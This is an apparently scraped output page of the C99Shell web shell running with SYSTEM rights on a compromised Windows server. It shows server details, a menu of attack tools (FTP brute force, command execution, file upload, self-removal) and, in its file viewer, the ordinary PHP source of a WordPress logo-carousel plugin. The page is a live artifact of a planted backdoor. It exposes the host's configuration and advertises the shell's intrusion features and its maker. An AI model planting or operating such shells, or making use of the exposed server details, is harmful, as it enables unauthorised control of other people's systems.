!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

C:\cumbreclima\wp-content\plugins\wp_logooos_plugin\   drwxrwxrwx
Free 4.11 GB of 39.52 GB (10.4%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     logos.php (5.24 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
    
/*
    Plugin Name: Logooos Wordpress plugin
    Plugin URI: http://codecanyon.net/user/husamrayan
    Description: Logooos Wordpress plugin.
    Version: 2.0
    Author: husamrayan
    */
    
    
    /*==========================================================================
        enqueue
    ==========================================================================*/
    
    
function logooos_theme_enqueue() {
    
        
wp_register_style'logooos-style'plugins_url('css/logos.css'__FILE__) );
        
wp_enqueue_style'logooos-style' );
        
        
wp_enqueue_script('jquery');
        
        
wp_register_script'bth_touchSwipe'plugins_url('js/helper-plugins/jquery.touchSwipe.min.js'__FILE__), nullnulltrue );
        
wp_enqueue_script'bth_touchSwipe' );
        
        
wp_register_script'bth_carouFredSel'plugins_url('js/jquery.carouFredSel-6.2.1.js'__FILE__), nullnulltrue );
        
wp_enqueue_script'bth_carouFredSel' );
        
        
wp_register_script'logooos_script'plugins_url('js/logos.js'__FILE__), nullnulltrue );
        
wp_enqueue_script'logooos_script' );
        
    }
    
    
add_action'wp_enqueue_scripts''logooos_theme_enqueue' );
    
    function 
logooos_admin_enqueue($hook) {
        
        global 
$post;
        
        if ( isset(
$post) && $post->post_type == 'logooo_sc' && ($hook == 'post-new.php' || $hook == 'post.php') ) {
            
            
wp_register_style'logooos-style'plugins_url('css/logos.css'__FILE__) );
            
wp_enqueue_style'logooos-style' );
                
            
wp_register_style'logooos-admin-style'plugins_url('css/admin.css'__FILE__) );
            
wp_enqueue_style'logooos-admin-style' );
                
            
wp_register_script'bth_touchSwipe'plugins_url('js/helper-plugins/jquery.touchSwipe.min.js'__FILE__), nullnulltrue );
            
wp_enqueue_script'bth_touchSwipe' );
                
            
wp_register_script'bth_carouFredSel'plugins_url('js/jquery.carouFredSel-6.2.1.js'__FILE__), nullnulltrue );
            
wp_enqueue_script'bth_carouFredSel' );
                
            
wp_register_script'logooos-generate-shortcode'plugins_url('js/generate_shortcode.js'__FILE__), nullnulltrue );
            
wp_enqueue_script'logooos-generate-shortcode' );
                
            
wp_register_script'logooos_script'plugins_url('js/logos.js'__FILE__), nullnulltrue );
            
wp_enqueue_script'logooos_script' );
                
            global 
$wp_version;
                
            
//If the WordPress version is greater than or equal to 3.5, then load the new WordPress color picker.
            
if ($wp_version >= 3.5){
                
//Both the necessary css and javascript have been registered already by WordPress, so all we have to do is load them with their handle.
                
wp_enqueue_style'wp-color-picker' );
                
wp_enqueue_script'wp-color-picker' );

            }
            
//If the WordPress version is less than 3.5 load the older farbtasic color picker.
            
else {
                
//As with wp-color-picker the necessary css and javascript have been registered already by WordPress, so all we have to do is load them with their handle.
                
wp_enqueue_style'farbtastic' );
                
wp_enqueue_script'farbtastic' );
            }
                
            
            
        }
        
    }
    
    
add_action'admin_enqueue_scripts''logooos_admin_enqueue' );

    
    
    
/*==========================================================================
        Register logooo Post Type
    ============================================================================*/
    
    
include('inc/logooo_custom_post.php');
    
    
    
/*==========================================================================
        Shortcode
    ============================================================================*/
    
    
include('inc/shortcodes.php');
    
    
    
/*==========================================================================
        Register logooo_sc Post Type
    ============================================================================*/
    
    
include('inc/generate_shortcode/generate_shortcode.php');
    
    
    
/*==========================================================================
        Admin Menu
    ============================================================================*/
    
    
add_action('admin_menu''register_logooo_custom_submenu_page');

    function 
register_logooo_custom_submenu_page() {
        
        
// Generate Shortcode Page
        
add_submenu_page'edit.php?post_type=logooo''Generate shortcode''Generate shortcode''manage_options''post-new.php?post_type=logooo_sc' );
        
        
// Saved Shortcodes Page
        
add_submenu_page'edit.php?post_type=logooo''Saved Shortcodes''Saved Shortcodes''manage_options''edit.php?post_type=logooo_sc' );
        
        
// Restore old data
        
$args =    array ( 'post_type' => 'myclients''posts_per_page' => -1'post_status' => 'any');
        
$clients_query = new WP_Query$args );
        
        if(
$clients_query->post_count && get_option('logooos_data_restored')=='') {
            
add_submenu_page'edit.php?post_type=logooo''Restore Old Data''Restore Old Data''manage_options''logooos_restore_old_data''logooos_restore_old_data_callback' );
        }
        
    }
    
    
    
// Restore old data
    
function logooos_restore_old_data_callback() {
        
        include(
'inc/restore_old_data.php');

    }
    
    
    
/*==========================================================================
        Shortcode Widget
    ============================================================================*/
    
    
include('inc/widget.php');
    
    
/*==========================================================================
        Integrate With VC
    ============================================================================*/
    
    
include('inc/integrate_with_vc.php');
    
    


?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0156 ]--